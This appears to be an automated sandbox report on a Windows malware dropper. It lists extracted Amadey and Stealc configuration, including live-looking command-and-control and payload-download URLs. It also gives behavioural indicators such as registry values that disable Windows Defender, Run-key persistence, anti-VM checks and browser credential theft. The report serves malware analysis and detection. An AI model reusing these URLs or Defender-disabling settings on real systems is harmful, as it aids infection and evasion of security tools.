Analysis
-
max time kernel
147s -
max time network
137s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
24/03/2025, 09:07
Static task
static1
Behavioral task
behavioral1
Sample
86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe
Resource
win10v2004-20250314-en
General
-
Target
86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe
-
Size
938KB
-
MD5
278fa6cdc2189c33b3cf59614d6d9e7f
-
SHA1
f382716bf5dc31ee6cdac0a1f9890a5164d0c18e
-
SHA256
86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a
-
SHA512
76cdd7a6b9e45ae8413f60e0369d045bfd1bfc3e879e0fac54c1303d312813380dc8907aeaf5e6525b47aa9c3768bac99c58fd1f7a2a38f5f193b5d55ebbf9c6
-
SSDEEP
24576:eqDEvCTbMWu7rQYlBQcBiT6rprG8a0uu:eTvC/MTQYxsWR7a0u
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
stealc
trump
http://45.93.20.28
-
url_path
/85a1cacf11314eb8.php
Signatures
-
Amadey family
-
Detect Vidar Stealer 4 IoCs
resource yara_rule behavioral1/memory/3240-651-0x0000000000400000-0x0000000000869000-memory.dmp family_vidar_v7 behavioral1/memory/3240-652-0x0000000000400000-0x0000000000869000-memory.dmp family_vidar_v7 behavioral1/memory/3240-837-0x0000000000400000-0x0000000000869000-memory.dmp family_vidar_v7 behavioral1/memory/3240-979-0x0000000000400000-0x0000000000869000-memory.dmp family_vidar_v7 -
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral1/memory/2716-299-0x00000000009E0000-0x0000000000E22000-memory.dmp healer behavioral1/memory/2716-307-0x00000000009E0000-0x0000000000E22000-memory.dmp healer behavioral1/memory/2716-626-0x00000000009E0000-0x0000000000E22000-memory.dmp healer -
Gcleaner family
-
Healer family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" e9ccb8daa1.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" e9ccb8daa1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" e9ccb8daa1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" e9ccb8daa1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" e9ccb8daa1.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection e9ccb8daa1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" e9ccb8daa1.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" e9ccb8daa1.exe -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications e9ccb8daa1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" e9ccb8daa1.exe -
Stealc family
-
Vidar family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempUEZGZYBGAIYFHQJUHWMTIMITTGVXAXCB.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 9daa8ce51a.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 8045970a06.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ e9ccb8daa1.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 5d0ced5341.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempJ6ISIVLP2VAEPWVQIOEOXTBQ5FZKK7CH.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe -
Blocklisted process makes network request 3 IoCs
flow pid Process 4 1980 powershell.exe 8 2748 powershell.exe 9 2520 powershell.exe -
pid Process 2504 powershell.exe 2476 powershell.exe 2564 powershell.exe 1980 powershell.exe 2748 powershell.exe 2520 powershell.exe -
Downloads MZ/PE file 6 IoCs
flow pid Process 8 2748 powershell.exe 9 2520 powershell.exe 7 2992 rapes.exe 7 2992 rapes.exe 7 2992 rapes.exe 4 1980 powershell.exe -
Uses browser remote debugging 2 TTPs 4 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 4032 chrome.exe 2372 chrome.exe 3540 chrome.exe 3748 chrome.exe -
Checks BIOS information in registry 2 TTPs 16 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5d0ced5341.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempJ6ISIVLP2VAEPWVQIOEOXTBQ5FZKK7CH.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempJ6ISIVLP2VAEPWVQIOEOXTBQ5FZKK7CH.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempUEZGZYBGAIYFHQJUHWMTIMITTGVXAXCB.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 9daa8ce51a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion e9ccb8daa1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5d0ced5341.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion e9ccb8daa1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempUEZGZYBGAIYFHQJUHWMTIMITTGVXAXCB.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 9daa8ce51a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8045970a06.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8045970a06.exe -
Executes dropped EXE 12 IoCs
pid Process 2904 TempJ6ISIVLP2VAEPWVQIOEOXTBQ5FZKK7CH.EXE 2992 rapes.exe 1956 7ba969f541.exe 1124 TempUEZGZYBGAIYFHQJUHWMTIMITTGVXAXCB.EXE 2296 QL4t9UZ.exe 2692 483d2fa8a0d53818306efeb32d3.exe 2752 9daa8ce51a.exe 820 8045970a06.exe 2228 770a8152e2.exe 2716 e9ccb8daa1.exe 3240 5d0ced5341.exe 4040 f58b0dd405.exe -
Identifies Wine through registry keys 2 TTPs 8 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine TempUEZGZYBGAIYFHQJUHWMTIMITTGVXAXCB.EXE Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine 9daa8ce51a.exe Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine 8045970a06.exe Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine e9ccb8daa1.exe Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine 5d0ced5341.exe Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine TempJ6ISIVLP2VAEPWVQIOEOXTBQ5FZKK7CH.EXE -
Loads dropped DLL 21 IoCs
pid Process 1980 powershell.exe 2904 TempJ6ISIVLP2VAEPWVQIOEOXTBQ5FZKK7CH.EXE 2992 rapes.exe 2748 powershell.exe 2992 rapes.exe 2992 rapes.exe 2520 powershell.exe 2992 rapes.exe 2992 rapes.exe 2992 rapes.exe 2992 rapes.exe 2992 rapes.exe 2992 rapes.exe 2992 rapes.exe 2992 rapes.exe 2992 rapes.exe 2992 rapes.exe 2680 WerFault.exe 2680 WerFault.exe 2680 WerFault.exe 2680 WerFault.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features e9ccb8daa1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" e9ccb8daa1.exe -
Adds Run key to start application 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\7ba969f541.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10318740101\\7ba969f541.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10318750121\\am_no.cmd" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\9daa8ce51a.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10319000101\\9daa8ce51a.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\8045970a06.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10319010101\\8045970a06.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\770a8152e2.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10319020101\\770a8152e2.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\e9ccb8daa1.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10319030101\\e9ccb8daa1.exe" rapes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x00050000000194ef-31.dat autoit_exe behavioral1/files/0x0005000000019643-168.dat autoit_exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
pid Process 3740 tasklist.exe 3876 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
pid Process 2904 TempJ6ISIVLP2VAEPWVQIOEOXTBQ5FZKK7CH.EXE 2992 rapes.exe 1124 TempUEZGZYBGAIYFHQJUHWMTIMITTGVXAXCB.EXE 2692 483d2fa8a0d53818306efeb32d3.exe 2752 9daa8ce51a.exe 820 8045970a06.exe 2716 e9ccb8daa1.exe 3240 5d0ced5341.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job TempJ6ISIVLP2VAEPWVQIOEOXTBQ5FZKK7CH.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 35 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 770a8152e2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7ba969f541.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9daa8ce51a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempJ6ISIVLP2VAEPWVQIOEOXTBQ5FZKK7CH.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 770a8152e2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5d0ced5341.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8045970a06.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 770a8152e2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e9ccb8daa1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 5d0ced5341.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 5d0ced5341.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 3200 timeout.exe 1968 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Kills process with taskkill 5 IoCs
pid Process 2528 taskkill.exe 1568 taskkill.exe 1324 taskkill.exe 2504 taskkill.exe 1740 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_Classes\Local Settings firefox.exe -
Modifies system certificate store 2 TTPs 3 IoCs
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a 5d0ced5341.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a 5d0ced5341.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 5d0ced5341.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2352 schtasks.exe 2852 schtasks.exe 768 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 34 IoCs
pid Process 1980 powershell.exe 1980 powershell.exe 1980 powershell.exe 2904 TempJ6ISIVLP2VAEPWVQIOEOXTBQ5FZKK7CH.EXE 2992 rapes.exe 2748 powershell.exe 2748 powershell.exe 2748 powershell.exe 1124 TempUEZGZYBGAIYFHQJUHWMTIMITTGVXAXCB.EXE 2504 powershell.exe 2476 powershell.exe 2564 powershell.exe 2520 powershell.exe 2520 powershell.exe 2520 powershell.exe 2692 483d2fa8a0d53818306efeb32d3.exe 2752 9daa8ce51a.exe 2752 9daa8ce51a.exe 2752 9daa8ce51a.exe 2752 9daa8ce51a.exe 2752 9daa8ce51a.exe 820 8045970a06.exe 2228 770a8152e2.exe 2716 e9ccb8daa1.exe 2228 770a8152e2.exe 3240 5d0ced5341.exe 3240 5d0ced5341.exe 2716 e9ccb8daa1.exe 2716 e9ccb8daa1.exe 3240 5d0ced5341.exe 3240 5d0ced5341.exe 3240 5d0ced5341.exe 4032 chrome.exe 4032 chrome.exe -
Suspicious use of AdjustPrivilegeToken 18 IoCs
description pid Process Token: SeDebugPrivilege 1980 powershell.exe Token: SeDebugPrivilege 2748 powershell.exe Token: SeDebugPrivilege 2504 powershell.exe Token: SeDebugPrivilege 2476 powershell.exe Token: SeDebugPrivilege 2564 powershell.exe Token: SeDebugPrivilege 2520 powershell.exe Token: SeDebugPrivilege 2504 taskkill.exe Token: SeDebugPrivilege 1740 taskkill.exe Token: SeDebugPrivilege 2528 taskkill.exe Token: SeDebugPrivilege 1568 taskkill.exe Token: SeDebugPrivilege 1324 taskkill.exe Token: SeDebugPrivilege 1636 firefox.exe Token: SeDebugPrivilege 1636 firefox.exe Token: SeDebugPrivilege 2716 e9ccb8daa1.exe Token: SeShutdownPrivilege 4032 chrome.exe Token: SeShutdownPrivilege 4032 chrome.exe Token: SeShutdownPrivilege 4032 chrome.exe Token: SeShutdownPrivilege 4032 chrome.exe -
Suspicious use of FindShellTrayWindow 58 IoCs
pid Process 2044 86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe 2044 86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe 2044 86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe 2904 TempJ6ISIVLP2VAEPWVQIOEOXTBQ5FZKK7CH.EXE 1956 7ba969f541.exe 1956 7ba969f541.exe 1956 7ba969f541.exe 2228 770a8152e2.exe 2228 770a8152e2.exe 2228 770a8152e2.exe 2228 770a8152e2.exe 2228 770a8152e2.exe 2228 770a8152e2.exe 2228 770a8152e2.exe 2228 770a8152e2.exe 2228 770a8152e2.exe 2228 770a8152e2.exe 1636 firefox.exe 1636 firefox.exe 1636 firefox.exe 1636 firefox.exe 2228 770a8152e2.exe 2228 770a8152e2.exe 2228 770a8152e2.exe 4032 chrome.exe 4032 chrome.exe 4032 chrome.exe 4032 chrome.exe 4032 chrome.exe 4032 chrome.exe 4032 chrome.exe 4032 chrome.exe 4032 chrome.exe 4032 chrome.exe 4032 chrome.exe 4032 chrome.exe 4032 chrome.exe 4032 chrome.exe 4032 chrome.exe 4032 chrome.exe 4032 chrome.exe 4032 chrome.exe 4032 chrome.exe 4032 chrome.exe 4032 chrome.exe 4032 chrome.exe 4032 chrome.exe 4032 chrome.exe 4032 chrome.exe 4032 chrome.exe 4032 chrome.exe 4032 chrome.exe 4032 chrome.exe 4032 chrome.exe 4032 chrome.exe 4032 chrome.exe 4032 chrome.exe 4032 chrome.exe -
Suspicious use of SendNotifyMessage 22 IoCs
pid Process 2044 86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe 2044 86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe 2044 86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe 1956 7ba969f541.exe 1956 7ba969f541.exe 1956 7ba969f541.exe 2228 770a8152e2.exe 2228 770a8152e2.exe 2228 770a8152e2.exe 2228 770a8152e2.exe 2228 770a8152e2.exe 2228 770a8152e2.exe 2228 770a8152e2.exe 2228 770a8152e2.exe 2228 770a8152e2.exe 2228 770a8152e2.exe 1636 firefox.exe 1636 firefox.exe 1636 firefox.exe 2228 770a8152e2.exe 2228 770a8152e2.exe 2228 770a8152e2.exe -
Suspicious use of WriteProcessMemory 64 IoCs
